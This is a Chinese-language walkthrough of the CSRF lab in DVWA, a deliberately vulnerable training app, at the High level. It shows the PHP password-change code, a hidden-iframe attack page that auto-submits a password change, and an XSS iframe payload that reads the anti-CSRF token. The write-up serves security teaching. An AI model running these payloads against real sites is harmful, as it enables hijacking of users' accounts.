High Level
查看源碼
<?php if( isset( $_GET[ 'Change' ] ) ) { // Check Anti-CSRF token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ]; // Do the passwords match? if( $pass_new == $pass_conf ) { // They do! $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); $pass_new = md5( $pass_new ); // Update the database $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' ); // Feedback for the user $html .= "<pre>Password Changed.</pre>"; } else { // Issue with passwords matching $html .= "<pre>Passwords did not match.</pre>"; } ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); } // Generate Anti-CSRF token generateSessionToken(); ?>
可以看到,High級別的代碼加入了Anti-CSRF token機制,用戶每次訪問改密頁面時,服務器會返回一個隨機的token,向服務器發起請求時,需要提交token參數,而服務器在收到請求時,會優先檢查token,只有token正確,才會處理客戶端的請求。
漏洞利用
要繞過High級別的反CSRF機制,關鍵是要獲取token,要利用受害者的cookie去修改密碼的頁面獲取關鍵的token。
試着去構造一個攻擊頁面,將其放置在攻擊者的服務器,引誘受害者訪問,從而完成CSRF攻擊,下面是代碼。
<script type="text/javascript"> function attack(){ document.getElementsByName('user_token')[0].value=document.getElementById("hack").contentWindow.document.getElementsByName('user_token')[0].value; document.getElementById("transfer").submit(); } </script> <iframe src="http://172.16.134.26/dvwa/vulnerabilities/csrf" id="hack" border="0" style="display:none;"> </iframe> <body onload="attack()"> <form method="GET" id="transfer" action="http://172.16.134.26/dvwa/vulnerabilities/csrf"> <input type="hidden" name="password_new" value="password"> <input type="hidden" name="password_conf" value="password"> <input type="hidden" name="user_token" value=""> <input type="hidden" name="Change" value="Change"> </form> </body>
攻擊思路是當受害者點擊進入這個頁面,腳本會通過一個看不見框架偷偷訪問修改密碼的頁面,獲取頁面中的token,並向服務器發送改密請求,以完成CSRF攻擊。
然而理想與現實的差距是巨大的,這里牽扯到了跨域問題,而現在的瀏覽器是不允許跨域請求的。這里簡單解釋下跨域,我們的框架iframe訪問的地址是http://172.16.134.26/dvwa/vulnerabilities/csrf,位於服務器172.16.134.26上,而我們的攻擊頁面位於黑客服務器172.16.135.47上,兩者的域名不同,域名B下的所有頁面都不允許主動獲取域名A下的頁面內容,除非域名A下的頁面主動發送信息給域名B的頁面,所以我們的攻擊腳本是不可能取到改密界面中的user_token。
由於跨域是不能實現的,所以我們要將攻擊代碼注入到目標服務器
172.16.134.26中,才有可能完成攻擊。下面利用High級別的XSS漏洞協助獲取Anti-CSRF token(因為這里的XSS注入有長度限制,不能夠注入完整的攻擊腳本,所以只獲取Anti-CSRF token)。
輸入 <iframe src="../csrf" onload=alert(frames[0].document.getElementsByName('user_token')[0].value)> ,點擊submit,成功彈出token
參考:https://www.freebuf.com/articles/web/118352.html